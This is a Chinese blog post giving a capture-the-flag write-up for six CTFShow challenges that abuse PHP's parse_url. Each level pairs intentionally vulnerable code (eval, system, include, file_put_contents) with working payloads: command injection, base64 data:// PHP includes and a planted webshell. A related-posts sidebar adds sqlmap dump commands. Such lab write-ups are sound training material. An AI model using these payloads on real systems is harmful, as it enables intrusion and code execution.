CTFShow--周末大挑战parse_url篇Writeup

已于 2023-06-11 13:25:01 修改
阅读量803 收藏 2
点赞数 3
分类专栏: CTF 文章标签: php 开发语言 Web CTFshow 周末大挑战
于 2023-05-15 10:19:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aluxian_/article/details/130670772
版权

CTFShow--周末大挑战详细wp

CTFShow 平台:https://ctf.show/

第一关:

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-10 10:58:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
$data = parse_url($_GET['u']);

eval($data['host']);

Payload:?u=http://system('cd ..;cd ..;cd ..;cat flag_is_here.txt');

在这里插入图片描述
也可以通过POST去执行命令获取,得到flagflag_is_here.txtcat查看一下即可。

?u=http://eval($_POST[a]);

a=system("ls /");

在这里插入图片描述在这里插入图片描述

ctfshow{a0e80fdb-2488-41ec-ab41-3f444485afb6}

第二关:

>  <?php
> 
> /*
> # -*- coding: utf-8 -*-
> # @Author: h1xa
> # @Date:   2023-05-10 09:52:06
> # @Last Modified by:   h1xa
> # @Last Modified time: 2023-05-12 13:25:53
> # @email: h1xa@ctfer.com
> # @link: https://ctfer.com
> 
> */
> 
> $data = parse_url($_GET['u']);
> include $data['host'].$data['path'];

在这里插入图片描述
Payload:

 get:
 ?u=ctfshow://data:://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgL19mKicpOz8%2b

ctfshow{d855cf94-0ea0-4ae6-9983-25331dae4b3d}

第三关:

在这里插入图片描述

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
$data = parse_url($_GET['u']);
include $data['scheme'].$data['path'];

Payload:

get:?u=data:://test/plain;base64,PD9waHAgc3lzdGVtKCRfUE9TVFtBXSk7Pz4=

post:A=tac /_f*

在这里插入图片描述

ctfshow{595cf0e0-350b-4a58-aa16-970b290fd1c9}

第四关:

在这里插入图片描述

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:35
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
$data = parse_url($_GET['u']);

system($data['host']);

Payload:?u=http://cd ..;cd ..;cd ..;tac 1_f1ag_1s*

在这里插入图片描述

ctfshow{644f5bb8-5572-4569-882d-1a5673e01f9b}

第五关:

在这里插入图片描述

<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
extract(parse_url($_GET['u']));
include $$$$$$host;

在这里插入图片描述
Payload:

get:
?u=%75%73%65%72%3a%2f%2f%70%61%73%73%3a%71%75%65%72%79%40%73%63%68%65%6d%65%2f%3f%66%72%61%67%6d%65%6e%74%23%64%61%74%61%3a%2f%2f%74%65%78%74%2f%70%6c%61%69%6e%3b%62%61%73%65%36%34%2c%50%44%39%77%61%48%41%67%63%33%6c%7a%64%47%56%74%4b%43%52%66%55%45%39%54%56%46%74%42%58%53%6b%37%50%7a%34%3d

post:
A=tac /_f1a*

ctfshow{2c95c0cf-6c53-46ce-bd87-1221067bc07a}

第六关:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2023-05-10 09:52:06
# @Last Modified by:   h1xa
# @Last Modified time: 2023-05-12 13:29:18
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

$data = parse_url($_GET['u']);

file_put_contents($data['path'], $data['host']);

在这里插入图片描述
Payload:

get:
?u=http://111<script language="php">eval($_POST[A]);/var/www/html/zzz.php  

post:
A=system("tac /_f1a*");

在这里插入图片描述

ctfshow{ba400845-b41f-4612-8f5a-30fa718db9a1}

在这里插入图片描述

至此本周的周末大挑战全部通过,感谢大家的观看和官网的wp不一样(当时做完了没有及时写 现在补完啦,又是充实的一天😊!)

落寞的魚丶
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
hive parse_url用法
Top5软件工程硕士,先后在京东、字节从事多年Java后端开发、实时和离线大数据开发
04-13 1700
select parse_url('http://facebook.com/path/p1.php?query=1', 'HOST') -- facebook.com select parse_url('http://facebook.com/path/p1.php?query=1', 'PATH') -- /path/p1.php select parse_url('http://fa...
GLM-4本地部署的实战教程
最新发布
herosunly的博客
06-05 10万+
本文主要介绍了GLM-4-9B本地部署的实战教程,希望对学习和使用大模型的同学们有所帮助。 文章目录 1. 前言 2. 配置环境 2.1 安装虚拟环境 2.2 安装依赖库 2.3 下载模型文件 3. 运行glm-4-9b-chat
ctfshow 每周挑战 RCE极限挑战4、5
Altering_Ji的博客
05-31 1566
ctfshow RCE极限挑战4和5 看过官方wp之后复现的,payload是自己后来写的,可能不如官方的看着清晰,但又很能碎碎念
CTFSHOW_周末挑战
m0_59448417的博客
05-14 302
CTFSHOW_周末挑战
ctfshow 周末挑战
m0_64348326的博客
05-15 170
1.file_get_contents将数据写入文件,但是不能使用?号,不然后面的内容都将会被当成GET传的参。添加斜杠会被当成path参数,于是使用路径穿越执行命令或者编码都可以。1.变量覆盖,找到parse_url中没有脏数据和可控的参数。因为是写入路径中,所以path的值会带。1.第二关基础上删除http://,,下面要用绝对路径来写入。,再传参执行命令即可。
ctfshow每周挑战
Innocence_0的博客
02-04 925
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。第二种是自学,就是在网上找资源、找教程,或者是想办法认识一-些大佬,抱紧大腿,不过这种方法很耗时间,而且学习没有规划,可能很长一段时间感觉自己没有进步,容易劝退。如下图所示,POST传参时,参数名为code,后台对 “(”、“.” 做了替换。
CTFSHOW每周挑战——RCE
qq_61955196的博客
11-21 2833
ctfshow的每周挑战之RCE的解题方法和一些问题的解决方法和个人总结。
CTFShow-周末挑战parse-urlWriteup
05-19
Writeup主要涉及的是CTF(Capture The Flag)挑战中的Web安全领域,特别是URL解析漏洞的利用。CTF是一项网络安全竞赛,参与者通过解谜、破解密码等方式获取“国旗”(Flag),在这里指的是挑战的答案或关键信息...
yum-metadata-parser-1.1.2-16.el6.x86_64.rpm
05-30
yum-metadata-parser-1.1.2-16.el6.x86_64.rpm
gorm的parseTime=true报错 Error 1292: Incorrect datetime value: '0000-00-00' for column 'created_at' at
手写我对你的温柔
03-04 5636
我的mysql是8.x版本,mysql以前 datetime 的默认值可以设为 '0000-00-00 00:00:00', 新的mysql不能设为这个值,可以把默认值设置为正常的时间就可以了, 比如 '2020-03-0400:00:00' 或者 去掉sql_model 中的NO_ZERO_DATE配置即可 方式详解:【主要演示常用的方式2】 方式1: 使用se...
CTF之Parse_url函数
Elite的博客
05-31 2435
parse_url() 是 PHP 内置函数之一,用于解析 URL 字符串,将其拆分为不同的组成部分,可以获取协议、主机名、端口号、路径、查询参数等信息。
ctfshow每周挑战之RCE极限挑战
heike_Ch的博客
04-29 652
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
ctfshow 每周挑战 RCE极限挑战2
Altering_Ji的博客
05-06 748
ctfshow 每周挑战 RCE极限挑战 第2题 用变量自增的方法解题
ctfshow 每周挑战 RCE极限挑战3
Altering_Ji的博客
05-29 544
ctfshow 每周挑战 RCE极限挑战3 payload有长度限制105,通过变量自增构造出POST,实现RCE
CTFshow周末挑战wp
qq_61955196的博客
05-13 317
本来要看政治的(卑微的周末考期末人),群主突然说有比赛就来玩玩看了。没想到ak了。这里就讲一下我的解题思路。
ctfshow 每周挑战 极限命令运行
2301_81040377的博客
04-24 512
然后进行合理的手段只有01不难想到是二进制,然后我们再转换为刚才的八进制来执行命令。我们的目的是构造命令cat /flag。然后这里我们发现可以取反获得数字0 1。我们都可以直接执行8进制的了。没有通配符了,但是可以通过。是ascii字母的8进制值。现在直接用${##}替换1。先用脚本跑出这些东东能用。然后要找出1就能有答案了。跑完脚本发现这些可以用。的方式执行命令,其中。
ctfshow 每周挑战 极限命令执行
m0_64815693的博客
02-12 3957
ctfshow 每周挑战 极限命令执行 wp
ctfshow parse_url wp
2301_81040377的博客
05-15 489
函数就是解析URL并且进行拆分的。
parse_url函数的解释和绕过
https://www.cnblogs.com/zpchcbd/
04-29 1万+
parse_url函数 作用:parse_url — 解析 URL,返回其组成部分 mixed parse_url ( string $url [, int $component = -1 ] ) 本函数解析一个 URL 并返回一个关联数组,包含在 URL 中出现的各种组成部分。 参数: url:要解析的 URL。无效字符将使用 _ 来替换。 component: 指定 PHP_URL_SCHEM...
ctfshow sql
08-03
回答: 要在ctfshow数据库中执行SQL查询和获取数据,可以使用sqlmap工具。首先,使用以下命令查询ctfshow_user表的列名:python ./sqlmap.py -u "http://ef1aabd2-a275-40df-8ad4-99e7563322f8.challenge.ctf.show/api/?id=" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --columns。[1]接下来,使用以下命令来查询和获取ctfshow_user表中的数据:python ./sqlmap.py -u "http://ef1aabd2-a275-40df-8ad4-99e7563322f8.challenge.ctf.show/api/?id=" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --dump。[2]如果你只想直接获取最后一步的数据,可以使用以下命令:python sqlmap.py -u "http://b794446b-7f11-4600-beba-3de5961369b7.challenge.ctf.show/api/" --data="id=1" --user-agent=sqlmap --referer=ctf.show -D ctfshow_web -T ctfshow_user --dump。[3]这些命令将帮助你在ctfshow数据库中执行SQL查询和获取数据。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

落寞的魚丶

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值